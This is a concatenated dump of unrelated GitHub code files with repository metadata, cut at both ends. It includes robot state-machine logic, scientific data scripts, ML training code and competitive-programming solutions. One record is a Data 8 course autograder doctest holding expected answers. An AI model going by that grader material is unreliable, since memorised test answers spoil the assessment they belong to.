tf.reduce_sum(tf.sqrt(tf.square(mean_p)-tf.reduce_mean(tf.square(ps), axis=[1, 2, 3])), axis=[1, 2, 3])\n return -tf.reduce_mean((ts-mean_t)*(ps-mean_p) / (std_t*std_p+eps), axis=[1, 2, 3])\n'''\n","repo_name":"YipengHu/MPHY0041","sub_path":"tutorials/registration/tf_utils.py","file_name":"tf_utils.py","file_ext":"py","file_size_in_byte":7295,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"29810618636","text":"test = {\n 'name': 'Question 3.1.1',\n 'points': 2,\n 'suites': [\n {\n 'cases': [\n {\n 'code': r\"\"\"\n >>> len(my_20_features)\n 20\n >>> np.all([f in test_lyrics.labels for f in my_20_features])\n True\n \"\"\",\n 'hidden': False,\n 'locked': False\n },\n ],\n 'scored': True,\n 'setup': '',\n 'teardown': '',\n 'type': 'doctest'\n }\n ]\n}\n","repo_name":"data-8/data8assets","sub_path":"materials/sp16/labs/project2/tests/q311.py","file_name":"q311.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"37"} +{"seq_id":"37795036127","text":"import smach\nimport smach_ros\n\nfrom greeting_bot_state_machine import ask_want_quiz_states\nfrom greeting_bot_state_machine import ask_want_tour_states\nfrom greeting_bot_state_machine import auto_charge_states\nfrom greeting_bot_state_machine import cogrob_rosbag_states\nfrom greeting_bot_state_machine import engage_people_states\nfrom greeting_bot_state_machine import face_states\nfrom greeting_bot_state_machine import general_states\nfrom greeting_bot_state_machine import quiz_states\nfrom greeting_bot_state_machine import robot_pose_states\nfrom greeting_bot_state_machine import tour_states\nfrom greeting_bot_state_machine import trivia_mode\nfrom greeting_bot_state_machine import wait_trigger_states\n\n\nclass ResetSessionData(smach.State):\n def __init__(self):\n smach.State.__init__(\n self, outcomes=[\"next\"], output_keys=[\"should_train\", \"human_name\"])\n\n\n def execute(self, userdata):\n userdata.should_train = False\n userdata.human_name = None\n return \"next\"\n\n\nclass SetShouldTrainState(smach.State):\n def __init__(self):\n smach.State.__init__(self, outcomes=[\"next\"], output_keys=[\"should_train\"])\n\n\n def execute(self, userdata):\n userdata.should_train = True\n return \"next\"\n\n\nclass TestShouldTrainState(smach.State):\n def __init__(self):\n smach.State.__init__(\n self, outcomes=[\"affirmative\", \"negative\"], input_keys=[\"should_train\"])\n\n\n def execute(self, userdata):\n if userdata.should_train:\n return \"affirmative\"\n else:\n return \"negative\"\n\n\ndef GetGreetingBotTopStateMachine():\n sm = smach.StateMachine(outcomes=[\"finished\", \"error\"])\n sm.userdata.human_name = None\n sm.userdata.should_train = False\n\n with sm:\n smach.StateMachine.add(\n \"finish_rosbag_cleanup\",\n cogrob_rosbag_states.FinishRecording(),\n transitions={\"next\":\"test_charging\"})\n sm.set_initial_state([\"finish_rosbag_cleanup\"])\n\n test_charging_sm = auto_charge_states.GetAutoChargingStateMachine()\n smach.StateMachine.add(\n \"test_charging\", test_charging_sm,\n transitions={\"no_need_charge\": \"wait_for_trigger\",\n \"finished_charging\": \"go_prepare\",\n \"already_charging\": \"already_charging_delay\",\n \"interrupt\": \"wait_for_trigger\",\n \"failed\": \"error\"})\n\n smach.StateMachine.add(\n \"already_charging_delay\", general_states.WaitTimeState(1),\n transitions={\"next\": \"finish_rosbag_cleanup\"})\n\n go_prepare_sm = (\n 
robot_pose_states.GetGoToReadyPositionStateAndPrepareStateMachine())\n smach.StateMachine.add(\n \"go_prepare\", go_prepare_sm,\n transitions={\"success\": \"wait_for_trigger\",\n \"fail\": \"wait_for_trigger\"})\n\n wait_for_trigger_sm = (\n wait_trigger_states.GetWaitForTriggerMachine())\n smach.StateMachine.add(\n \"wait_for_trigger\", wait_for_trigger_sm,\n transitions={\"wakeword\": \"start_rosbag_recording_wakeword\",\n \"face\": \"start_rosbag_recording_face\",\n \"man_go_prep\": \"go_prepare\",\n \"man_go_charge\": \"go_charge_1\",\n \"nothing\": \"delay_restart\"})\n\n smach.StateMachine.add(\n \"go_charge_1\", robot_pose_states.GetPrepareToMoveStateMachine(),\n transitions={\"success\": \"go_charge_2\", \"fail\": \"finish_rosbag_cleanup\"})\n\n smach.StateMachine.add(\n \"go_charge_2\", auto_charge_states.GoDockingState(),\n transitions={\"done\": \"finish_rosbag_cleanup\",\n \"failed\": \"finish_rosbag_cleanup\"})\n\n smach.StateMachine.add(\n \"delay_restart\", general_states.WaitTimeState(.1),\n transitions={\"next\": \"finish_rosbag_cleanup\"})\n\n smach.StateMachine.add(\n \"start_rosbag_recording_face\", cogrob_rosbag_states.StartRecording(),\n transitions={\"next\":\"reset_session_data_face\"})\n\n smach.StateMachine.add(\n \"start_rosbag_recording_wakeword\",\n cogrob_rosbag_states.StartRecording(),\n transitions={\"next\":\"reset_session_data_wakeword\"})\n\n smach.StateMachine.add(\n \"reset_session_data_face\", ResetSessionData(),\n transitions={\"next\":\"greet_people_with_face\"},\n remapping={\"should_train\":\"should_train\", \"human_name\":\"human_name\"})\n\n smach.StateMachine.add(\n \"reset_session_data_wakeword\", ResetSessionData(),\n transitions={\"next\":\"ask_want_tour\"},\n remapping={\"should_train\":\"should_train\", \"human_name\":\"human_name\"})\n\n greet_people_with_face_sm = (\n engage_people_states.GetGreetPeopleWithFaceOrRememberFaceStateMachine())\n if trivia_mode.TRIVIA_MODE:\n smach.StateMachine.add(\n \"greet_people_with_face\", greet_people_with_face_sm,\n transitions={\"known_person\": \"ask_want_quiz\",\n \"unknown_person\": \"set_should_train\",\n \"error\": \"finish_rosbag_recording_error\"},\n remapping={\"human_name\":\"human_name\"})\n else:\n smach.StateMachine.add(\n \"greet_people_with_face\", greet_people_with_face_sm,\n transitions={\"known_person\": \"ask_want_tour\",\n \"unknown_person\": \"set_should_train\",\n \"error\": \"finish_rosbag_recording_error\"},\n remapping={\"human_name\":\"human_name\"})\n\n smach.StateMachine.add(\n \"set_should_train\", SetShouldTrainState(),\n transitions={\"next\":\"ask_want_quiz\"},\n remapping={\"should_train\":\"should_train\"})\n\n ask_want_quiz_sm = ask_want_quiz_states.GetAskWantQuizStateMachine()\n smach.StateMachine.add(\n \"ask_want_quiz\", ask_want_quiz_sm,\n transitions={\"want_quiz\": \"play_quiz\",\n \"dont_want_quiz\": \"ask_want_tour\",\n \"silence\": \"finish_rosbag_recording_error\"})\n\n quiz_sm = quiz_states.GetQuizStateMachine()\n smach.StateMachine.add(\n \"play_quiz\", quiz_sm,\n transitions={\"finished\": \"test_should_train\",\n \"silence\": \"finish_rosbag_recording_error\"})\n\n smach.StateMachine.add(\n \"test_should_train\", TestShouldTrainState(),\n transitions={\n \"affirmative\": \"train_on_face_with_name\",\n \"negative\": \"ask_want_tour\"},\n remapping={\"should_train\": \"should_train\"})\n\n smach.StateMachine.add(\n \"train_on_face_with_name\",\n face_states.TrainOnFaceWithNameState(),\n transitions={\"next\": \"ask_want_tour\"},\n 
remapping={\"human_name\": \"human_name\"})\n\n if trivia_mode.TRIVIA_MODE:\n smach.StateMachine.add(\n \"ask_want_tour\", general_states.BypassState(),\n transitions={\"next\": \"say_have_good_day\"})\n else:\n ask_want_tour_sm = ask_want_tour_states.GetAskWantTourStateMachine()\n smach.StateMachine.add(\n \"ask_want_tour\", ask_want_tour_sm,\n transitions={\"want_tour\": \"guide_tour\",\n \"dont_want_tour\": \"say_have_good_day\",\n \"silence\": \"finish_rosbag_recording_error\"})\n\n tour_sm = tour_states.GetTourGuideStateMachine()\n smach.StateMachine.add(\n \"guide_tour\", tour_sm,\n transitions={\"finished\": \"say_have_good_day_tour\",\n \"failed\": \"finish_rosbag_recording_before_go_prepare\"})\n\n smach.StateMachine.add(\n \"say_have_good_day_tour\", engage_people_states.SayHaveGoodDayState(),\n transitions={\"next\": \"finish_rosbag_recording_before_go_prepare\"})\n\n smach.StateMachine.add(\n \"finish_rosbag_recording_before_go_prepare\",\n cogrob_rosbag_states.FinishRecording(),\n transitions={\"next\":\"go_prepare\"})\n\n smach.StateMachine.add(\n \"say_have_good_day\", engage_people_states.SayHaveGoodDayState(),\n transitions={\"next\": \"finish_rosbag_recording_finished\"})\n\n smach.StateMachine.add(\n \"finish_rosbag_recording_finished\",\n cogrob_rosbag_states.FinishRecording(), transitions={\"next\":\"finished\"})\n\n smach.StateMachine.add(\n \"finish_rosbag_recording_error\",\n cogrob_rosbag_states.FinishRecording(), transitions={\"next\":\"error\"})\n\n return sm\n","repo_name":"CogRob/TritonBot","sub_path":"cogrob_ros/greeting_bot_state_machine/src/greeting_bot_state_machine/greeting_bot_top.py","file_name":"greeting_bot_top.py","file_ext":"py","file_size_in_byte":8050,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"32456281895","text":"\nimport datacube\nimport sys\nimport rasterio\nimport numpy as np\nimport time\nimport os\nimport subprocess\nfrom datacube.drivers.netcdf import netcdf_writer\nfrom datacube.drivers.netcdf import create_netcdf_storage_unit, write_dataset_to_netcdf\nimport xarray as xr\nfrom os import path\nfrom datacube.model import Measurement \nfrom datacube.model import DatasetType as Product\nfrom datacube.model.utils import make_dataset, xr_apply, datasets_to_doc\nfrom pathlib import Path\nfrom datacube.api.query import query_group_by, query_geopolygon\nfrom datacube.utils.geometry import CRS\nimport yaml\nfrom yaml import CSafeLoader as Loader, CSafeDumper as Dumper\n\ndef read_data_from_netcdf(fname):\n dataset_array = xr.open_dataset(fname)\n return dataset_array.damage_level\n\ndef count_damage(damage_level, axis, label=0):\n print(\"count\", label)\n print(\"axis\", axis)\n return np.unique(damage_level, axis=axis, return_counts=True)[1]\n\ndef main(x1, y1, year, name):\n start = int(year)\n end = int(year) + 1\n dir_name = 'cyclone_damage_results_v2/' + name \n\n fin = '_'.join([name, str(x1), str(y1), str(start), str(end)]) + '.nc'\n fin = path.join(dir_name, fin)\n if path.exists(fin) == False:\n return\n \n damage_level = read_data_from_netcdf(fin)\n results = np.zeros(damage_level.shape[1:], dtype='int16')\n\n while True:\n end += 1\n fin = '_'.join([name, str(x1), str(y1), str(start), str(end)]) + '.nc'\n fin = path.join(dir_name, fin)\n if path.exists(fin) == False:\n break\n\n damage_level = xr.concat([damage_level, read_data_from_netcdf(fin)], dim='time')\n\n tmp = damage_level.where(np.logical_and(damage_level<=2, damage_level > 0)).count(dim='time')\n 
results[tmp.values > 0] = 1\n    results[tmp.values==damage_level.time.shape[0]] = 2\n\n    tmp = damage_level.where(np.logical_and(damage_level<=4, damage_level > 2)).count(dim='time')\n    results[tmp.values > 0] = 3\n    results[tmp.values==damage_level.time.shape[0]] = 4\n\n    tmp = damage_level.where(damage_level==4).count(dim='time')\n    results[tmp.values==damage_level.time.shape[0]] = 5\n    results[damage_level.values[0]==-1] = -1\n\n    damage_level.time.attrs['units'] = \"seconds since 1970-01-01 00:00:00\"\n    results = results.reshape((1, ) + results.shape)\n    results = xr.Dataset({\"damage_level\":(['time', 'y', 'x'], results)}, \n            coords={'time':damage_level.time[-1:], 'y': damage_level.y, 'x': damage_level.x},\n            attrs={'crs': CRS('EPSG:3577')})\n    print(results)\n\n    fout = '_'.join([name, str(x1), str(y1), 'all']) + '.nc'\n    write_dataset_to_netcdf(results, path.join(dir_name, fout))\n\nif __name__ == '__main__':\n\n    nargv = len(sys.argv)\n    if nargv!=5:\n        print(\"Usage: whatever.py x1 y1 year name\")\n        exit()\n\n    args = sys.argv[1:]\n    main(*args)\n","repo_name":"christopherowers/TC_mangroves","sub_path":"NCI_code_old/mangrove_change_on_cyclone_all.py","file_name":"mangrove_change_on_cyclone_all.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"20012831476","text":"import random\nimport json\nfrom enum import Enum, auto\nimport datetime\n\nclass Doctor():\n    def __init__(self, first_name, last_name):\n        self.first_name = first_name\n        self.last_name = last_name\n        self.u_id = random.randint(1, 2**32-1)\n        self.appointments = {}\n\n    def add_appointment(self, appointment):\n        if appointment.date in self.appointments:\n            daily_appointments = self.appointments[appointment.date]\n            daily_appointments.add(appointment)\n        else:\n            self.appointments[appointment.date] = {appointment}\n\n    def delete_appointment(self, u_id):\n        for date in self.appointments:\n            for appointment in self.appointments[date]:\n                if appointment.u_id == u_id:\n                    self.appointments[date].remove(appointment)\n                    return True\n        return False\n\n    def json(self):\n        values = {\n            'first_name' : self.first_name,\n            'last_name' : self.last_name,\n            'u_id' : self.u_id\n        }\n        return values\n\n    def __str__(self):\n        return json.dumps(self.json())\n\nclass Appointment():\n    class AppointmentType(Enum):\n        FOLLOW_UP = auto()\n        NEW_PATIENT = auto()\n\n    def __init__(self, first_name, last_name, date, time, kind):\n        time_splits = time.split(':')\n        hour, minute = int(time_splits[0]), int(time_splits[1])\n\n        date_splits = date.split('/')\n        month, day, year = int(date_splits[0]), int(date_splits[1]), int(date_splits[2])\n\n        time = datetime.time(hour=hour, minute=minute)\n        date = datetime.date(day=day, month=month, year=year)\n\n        kind = Appointment.AppointmentType[kind]\n\n        self.first_name = first_name\n        self.last_name = last_name\n        self.u_id = random.randint(1, 2**32-1)\n        self.date = date\n        self.time = time\n        self.kind = kind\n\n    def json(self):\n        values = {\n            'first_name' : self.first_name,\n            'last_name' : self.last_name,\n            'u_id' : self.u_id,\n            'date' : str(self.date),\n            'time' : str(self.time),\n            'kind' : self.kind.name\n        }\n        return values\n\n    def __str__(self):\n        return 
json.dumps(self.json())\n","repo_name":"sachal6/NotableProject","sub_path":"database_objects.py","file_name":"database_objects.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"15416358543","text":"from typing import List, Optional\nimport numpy as np\nimport pandas as pd\nimport os\n\nimport utils.util_functions as utils\nfrom utils.SYSCONFIG import DATA_PATH, PLATFORM\nfrom data_processing.normalization_functions.min_max_symmetrical import min_max_symmetrical\nfrom data_processing.normalization_functions.tanh_estimator import tanh_estimator\nfrom data_processing.normalization_functions.standardization import standardization\nfrom data_processing.normalization_functions.median_normalization import median_normalization\nfrom data_processing.normalization_functions.sigmoid_normalization import sigmoid_normalization\nfrom data_processing.normalization_functions.decimal_scaling_normalization import decimal_scaling_normalization\n\nimport data_generator.batch_data_path_generator as pg\n\ndef send_message(message: str, **kwargs) -> None:\n    utils.printc(source='[DATA NORMALIZATION]', message=message, **kwargs)\n\nFILE_COLUMN_NAME = 'Path'\n\n\ndef load_csv_files(path_list: List[str]) -> List[pd.DataFrame]:\n    dfs : List[pd.DataFrame] = []\n\n    file_count = len(path_list)\n    bar = utils.CustomBar('Loading files ... ', max=file_count)\n\n    for path in path_list:\n        df : pd.DataFrame = pd.read_csv(path, index_col=False)\n        df[FILE_COLUMN_NAME] = path\n        dfs.append(df)\n        bar.next()\n\n    return dfs\n\ndef normalize_df(df: pd.DataFrame, normalization_function) -> pd.DataFrame:\n    # iterate through each column and normalize the numeric ones\n    for column_name in df:\n\n        name : str = column_name\n        values = df[column_name].tolist()\n\n        # skip columns that only contain strings as well as the label columns\n        if all([isinstance(value, str) for value in values]) or name in ['LFA','RFA']:\n            continue\n\n        normalized_values = normalization_function(values)\n        df[column_name] = normalized_values\n\n    return df\n\ndef split_and_save_df(\n    df: pd.DataFrame,\n    original_file_index: List[str],\n    target_folder_path: str,\n    target_index_path: str\n) -> None:\n\n    paths_count = len(original_file_index)\n    bar = utils.CustomBar('Saving DataFrames to files ... ', max=paths_count)\n\n    paths : List[str] = []\n\n    utils.create_folder_if_not_exists(target_folder_path)\n\n    delimiter = '\\\\' if PLATFORM == 'WINDOWS' else '/'\n\n    for path in original_file_index:\n\n        frame = df.loc[(df[FILE_COLUMN_NAME] == path)]\n        frame = frame.drop(columns=[FILE_COLUMN_NAME])\n\n        file_name = path.split(delimiter)[-1]\n        new_path = os.path.join(target_folder_path,file_name)\n\n        paths.append(new_path)\n\n        header = str(list(frame.columns)).replace('[','').replace(']','').replace(\"'\",\"\").replace(', ',',')\n\n        np.savetxt(new_path, frame.values, delimiter=\",\",fmt='%10.8f',header=header,comments='')\n\n        bar.next()\n\n    with open(target_index_path, 'w') as f:\n        for path in paths:\n            f.write('%s\\n' % path)\n\ndef data_concatenation(normalization_mode: str, data_frames: List[pd.DataFrame]) -> Optional[List[pd.DataFrame]]:\n    '''Concatenate the data into the subsets that are passed to the normalization function.\n\n    Args:\n        normalization_mode (str): The mode of the normalization, which defines in\n        which subsets the files are passed to the normalization function\n        data_frames (List[pd.DataFrame]): The data as one DataFrame per file/time series\n\n    Returns:\n        Optional[List[pd.DataFrame]]: The data separated according to the normalization_mode\n    '''\n\n    send_message(f'Started concatenation of the data with the following mode: {normalization_mode}')\n\n    # combine the whole data to one big DataFrame\n    if normalization_mode == 'by_all':\n        combined_frame = pd.concat(data_frames)\n        return [combined_frame]\n\n    # return the data with one DataFrame by file/time series\n    if normalization_mode == 'by_time_series':\n        return data_frames\n\n    send_message(f'No normalization_mode found for {normalization_mode}')\n    return None\n\ndef apply_normalization(data_frames: List[pd.DataFrame], normalization_function: str) -> List[pd.DataFrame]:\n\n    dfs_count = len(data_frames)\n    bar = utils.CustomBar('Normalizing data frames ... ', max=dfs_count)\n\n    send_message(f'Starting normalization of {dfs_count} DataFrames using {normalization_function}')\n\n    # select the normalization function that is applied to each column\n    norm_func = None\n\n    if normalization_function == 'min_max_symmetrical':\n        norm_func = lambda row : min_max_symmetrical(row,y_extent=1)\n\n    elif normalization_function == 'tanh_estimator':\n        norm_func = lambda row : tanh_estimator(row)\n\n    elif normalization_function == 'standardization':\n        norm_func = lambda row : standardization(row)\n\n    elif normalization_function == 'median_normalization':\n        norm_func = lambda row : median_normalization(row)\n\n    elif normalization_function == 'sigmoid_normalization':\n        norm_func = lambda row : sigmoid_normalization(row)\n\n    elif normalization_function == 'decimal_scaling_normalization':\n        norm_func = lambda row : decimal_scaling_normalization(row)\n\n    else:\n        send_message('No normalization function was found! Using fallback min_max_symmetrical')\n        norm_func = lambda row : min_max_symmetrical(row,y_extent=1)\n\n    normalized_data_frames = [None] * dfs_count\n\n    # iterate through all data_frames and normalize them\n    for i in range(dfs_count):\n        data_frame = data_frames[i]\n        normalized_data_frame = normalize_df(data_frame,norm_func)\n        normalized_data_frames[i] = normalized_data_frame\n\n        bar.next()\n\n    return normalized_data_frames\n\n\ndef normalize(\n    dataset_name: str,\n    normalization_mode: str,\n    normalization_function: str,\n):\n\n    send_message('Started normalization for the following parameters:')\n    send_message(f'dataset_name: {dataset_name}')\n    send_message(f'normalization_mode: {normalization_mode}')\n    send_message(f'normalization_function: {normalization_function}')\n\n    original_data_index_path: str = pg.get_original_csv_index_path(\n        data_subset_name = dataset_name\n    )\n\n    # load the index of the original data\n    original_data_index : List[str] = utils.parse_index(original_data_index_path, verify=True)\n\n    # load the data\n    original_data : List[pd.DataFrame] = load_csv_files(original_data_index)\n\n    separated_data = data_concatenation(normalization_mode=normalization_mode, data_frames=original_data)\n\n    normalized_data = apply_normalization(data_frames=separated_data,normalization_function=normalization_function)\n\n    # create one combined big table to reuse saving code\n    combined_normalized_data = pd.concat(normalized_data)\n\n    # split the previously merged CSVs and save them with the corresponding appendix\n    normalization_folder_path: str = pg.get_folder_path(\n        data_subset_name = dataset_name,\n        normalization_function = normalization_function,\n        normalization_mode = normalization_mode,\n    )\n\n    normalized_data_index_path: str = pg.get_csv_index_path(\n        data_subset_name = dataset_name,\n        normalization_function = normalization_function,\n        normalization_mode = normalization_mode,\n    )\n\n    split_and_save_df(\n        df = combined_normalized_data,\n        original_file_index = original_data_index,\n        target_folder_path = normalization_folder_path,\n        target_index_path = normalized_data_index_path\n    )\n","repo_name":"andfaxle/cAIsar-ai-cup","sub_path":"src/data_processing/data_normalization_utils.py","file_name":"data_normalization_utils.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"12638393009","text":"from typing import List\n\n\nclass Solution:\n    def subArrayRanges(self, nums: List[int]) -> int:\n        res = 0\n\n        l, r = 0, len(nums) - 1\n\n        while l < len(nums):\n            r = len(nums) - 1\n            sub = nums[l:r+1]\n            prevMax, prevMin = max(sub), min(sub)\n            while r > l:\n                res += prevMax - prevMin\n                r -= 1\n                if prevMax == nums[r+1]:\n                    prevMax = max(nums[l:r+1])\n                if prevMin == nums[r+1]:\n                    prevMin = min(nums[l:r+1])\n\n            l += 1\n        return res\n\n\ns = Solution()\n\nres = s.subArrayRanges([0])\nprint(res)","repo_name":"segios/problems","sub_path":"python-problems/Arrays/2104.py","file_name":"2104.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"37383258995","text":"import sys\n\nrl = sys.stdin.readline\n\n\nprev_dyadic_map = [[0]]\ndyadic_map = []  # silence pyright\nN = 0\n\nwhile N < 5:\n    dyadic_map = []\n    for i in range(2**N):\n        dyadic_map.append(\n            prev_dyadic_map[i] + [4**N + x for x in reversed(prev_dyadic_map[i])]\n        )\n    for i in range(2**N):\n        dyadic_map.append([2 * 4**N + x for x in 
dyadic_map[2**N - (i + 1)]])\n prev_dyadic_map = dyadic_map\n N += 1\n\n\ndef c(i, j):\n return dyadic_map[i][j]\n\n\nlookup: dict[int, tuple[int, int]] = {}\nfor i in range(32):\n for j in range(32):\n lookup[c(i, j)] = (i + 1, j + 1)\n\n\nn, k = [int(_) for _ in rl().split()]\n\nfor i in range(n):\n print(\" \".join([str(c(i, j) ^ c(i, j + 1)) for j in range(n - 1)]))\nfor i in range(n - 1):\n print(\" \".join([str(c(i, j) ^ c(i + 1, j)) for j in range(n)]))\n\nsys.stdout.flush()\n\nbnum = 0\nfor _ in range(k):\n bnum ^= int(rl())\n row, col = lookup[bnum]\n print(row, col)\n sys.stdout.flush()\n","repo_name":"vEnhance/evan-learns-ioi","sub_path":"CodeForces/1673F/1673F.py","file_name":"1673F.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"7048648331","text":"import file_utils\nfrom firebase_admin import firestore\nfrom firebase_admin import storage\n\nclass PhotosCollectionManager():\n COLLECTION_PHOTOS = \"Photos\"\n KEY_PHOTO_URL = \"url\"\n KEY_PHOTO_CAPTION = \"caption\"\n KEY_PHOTO_CREATED = \"created\"\n \n \"\"\" Handles Firestore interactions for Photo objects. \"\"\"\n def __init__(self):\n self.ref = firestore.client().collection(self.COLLECTION_PHOTOS)\n\n def add_photo(self, photo_path):\n \"\"\" Uploads the file to Firebase Storage and creates a Firestore document based on the image url. \"\"\"\n download_url = self.upload_file(photo_path)\n if download_url is not None:\n caption = file_utils.get_caption()\n self.ref.add({\n self.KEY_PHOTO_CAPTION: caption,\n self.KEY_PHOTO_URL: download_url,\n self.KEY_PHOTO_CREATED: firestore.SERVER_TIMESTAMP\n })\n else:\n print(\"No photo added due to error during upload.\")\n\n def upload_file(self, photo_path):\n \"\"\" Uploads the file to Firebase Storage and returns the download url. \"\"\"\n try:\n filename = file_utils.remove_path(photo_path)\n print(filename)\n image_blob = storage.bucket().blob(f\"photos/{filename}\") # In Firebase Storage use the filename as the ref\n image_blob.upload_from_filename(photo_path)\n image_blob.make_public()\n print(\"File uploaded!\")\n return image_blob.public_url\n except Exception as err:\n print(\"An exception occurred during upload\", err)\n","repo_name":"fisherds/RPi","sub_path":"InitialLearning/PythonLearning/FirestoreViaPython/tank/firebase_photos.py","file_name":"firebase_photos.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37182504302","text":"import hydra\nfrom hydra.core.hydra_config import HydraConfig\nfrom omegaconf import DictConfig, OmegaConf\nimport pickle\nfrom pathlib import Path\nimport flwr as fl\nimport torch\n\nfrom dataset import prepare_dataset\nfrom client import generate_client_fn\nfrom server import get_on_fit_config_fn, get_evaluate_fn, AggregateCustomMetricStrategy\n\n@hydra.main(config_path='conf', config_name='base', version_base=None)\n\ndef main(cfg: DictConfig):\n\n ## 1. Parse config and print experiment output dir\n print(OmegaConf.to_yaml(cfg))\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n print(f\"Training on {device} using PyTorch {torch.__version__} and Flower {fl.__version__}\\n\")\n\n ## 2. 
Prepare dataset\n #trainloaders, validationloaders, testloader = dataset_femnist(cfg.batch_size)\n trainloaders, validationloaders, testloader = prepare_dataset(cfg.num_clients, cfg.batch_size)\n print(\"FEMNIST Dataset prepared\\n\")\n\n ## 3. Define clients\n client_fn = generate_client_fn(trainloaders, validationloaders, cfg.num_classes)\n\n ## 4. Define strategy\n strategy = AggregateCustomMetricStrategy( # fl.server.strategy.FedAvg\n min_fit_clients=cfg.num_clients,\n min_evaluate_clients=cfg.num_clients,\n min_available_clients=cfg.num_clients,\n on_fit_config_fn=get_on_fit_config_fn(cfg.config_fit),\n evaluate_fn=get_evaluate_fn(cfg.num_classes, testloader),\n on_evaluate_config_fn=None,\n accept_failures=False,\n )\n \n ## 5. Start Simulation \n history = fl.simulation.start_simulation(\n client_fn=client_fn,\n num_clients=cfg.num_clients,\n config=fl.server.ServerConfig(num_rounds=cfg.num_rounds),\n strategy=strategy,\n #client_resources={'num_cpus': cfg.num_cpus, 'num_gpus': cfg.num_gpus},\n #server=fl.server.Server(client_manager=fl.server.client_manager.SimpleClientManager(), strategy=strategy)\n )\n\n ## 6. Save your results\n save_path = HydraConfig.get().runtime.output_dir\n results_path = Path(save_path) / 'result.pkl'\n\n results = {'history':history}\n\n with open(str(results_path), 'wb') as h:\n pickle.dump(results, h, protocol=pickle.HIGHEST_PROTOCOL)\n\n \n\n\nif __name__ == '__main__':\n main()\n \n '''\n trainloader, testloader = get_mnist_loaders(cfg.batch_size)\n\n server = CentralizedServer(cfg.num_clients, cfg.batch_size, cfg.num_rounds, cfg.num_classes, trainloader, device)\n print(\"Start training ...\\n\")\n server.train(cfg.config_fit, device)\n print(\"\\nEvaluate model ...\\n\")\n loss, accuracy = server.evaluate(testloader, device)\n print(\"Loss: \", loss)\n print(\"Accuracy: \", accuracy)\n\n___________________________________________________________\n\n\n net = Net(cfg.num_classes).to(device)\n model = Net(cfg.num_classes)\n optimizer = torch.optim.SGD(model.parameters(), lr=cfg.config_fit.lr, momentum=cfg.config_fit.momentum)\n\n print(\"Start training\\n\")\n train(net, trainloader, optimizer, cfg.num_rounds, device)\n print(\"Evaluate model\\n\")\n loss, accuracy = test(net, testloader, device)\n print(\"Loss: \", loss)\n print(\"Accuracy: \", accuracy)\n '''","repo_name":"NartoTeroKK/partial-fed-learning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16758265042","text":"import sys\n\nt = int(sys.stdin.readline().strip())\nfor i in range(t):\n command = sys.stdin.readline().strip()\n arr_len = int(sys.stdin.readline().strip())\n if (arr_len == 0):\n input_arr = sys.stdin.readline().split()\n input_arr = []\n else:\n input_arr = list(map(int, sys.stdin.readline().strip()[1:-1].split(',')))\n is_reverse = False\n is_ok = True\n front = 0\n back = 0\n for act in command:\n try:\n if act == 'R':\n is_reverse = not is_reverse\n elif act == 'D' and not is_reverse:\n front += 1\n elif act == 'D' and is_reverse:\n back += 1\n except:\n is_ok = False\n print('error')\n break\n if is_ok == True:\n if (front + back) <= arr_len:\n if not is_reverse:\n input_arr = input_arr[front:arr_len - back]\n print(str(input_arr).replace(' ', ''))\n else:\n input_arr = input_arr[::-1][back:arr_len - front]\n print(str(input_arr).replace(' ', ''))\n else:\n 
print('error')\n","repo_name":"good5229/python-practice","sub_path":"5430.py","file_name":"5430.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15947913298","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nimport uncertainties as unc\nfrom uncertainties import unumpy as unp\n\ndef gaussian(x, a, b, c):\n return a * np.exp(-((x - b)**2) / (2 * c**2))\n\n\ndados_10 = pd.read_excel('Sessao_5/dados.xlsx', sheet_name='10')\ndados_5 = pd.read_excel('Sessao_5/dados.xlsx', sheet_name='5')\n\ny_10 = dados_10['h [mm]']\ny_5 = dados_5['h [mm]']\nRc_10 = dados_10['Rc corr']\neRc_10 = dados_10['eRc corr']\nRc_5 = dados_5['Rc corr']\neRc_5 = dados_5['eRc corr']\n\n# Ajuste da gaussiana para Rc_10 com erros\nparams_10, covariance_10 = curve_fit(gaussian, y_10, Rc_10, p0=[1, 10, 1], sigma=eRc_10)\n\n# Ajuste da gaussiana para Rc_5 com erros\nparams_5, covariance_5 = curve_fit(gaussian, y_5, Rc_5, p0=[1, 10, 1], sigma=eRc_5)\n\na_10, b_10, c_10 = params_10\na_5, b_5, c_5 = params_5\n\n# Qui-quadrado e número de graus de liberdade (ndf) para Rc_10\nchi_squared_10 = np.sum(((Rc_10 - gaussian(y_10, *params_10)) / eRc_10)**2)\nndf_10 = len(y_10) - len(params_10)\n\n# Qui-quadrado e número de graus de liberdade (ndf) para Rc_5\nchi_squared_5 = np.sum(((Rc_5 - gaussian(y_5, *params_5)) / eRc_5)**2)\nndf_5 = len(y_5) - len(params_5)\n\n# Plot dos dados, curva ajustada e erros para Rc_10\nplt.errorbar(y_10, Rc_10, yerr=eRc_10, label=f'10 $\\mu Ci$ em cima', capsize=1, markersize=2, ecolor='red', color='red', fmt='.')\nx_range_10 = 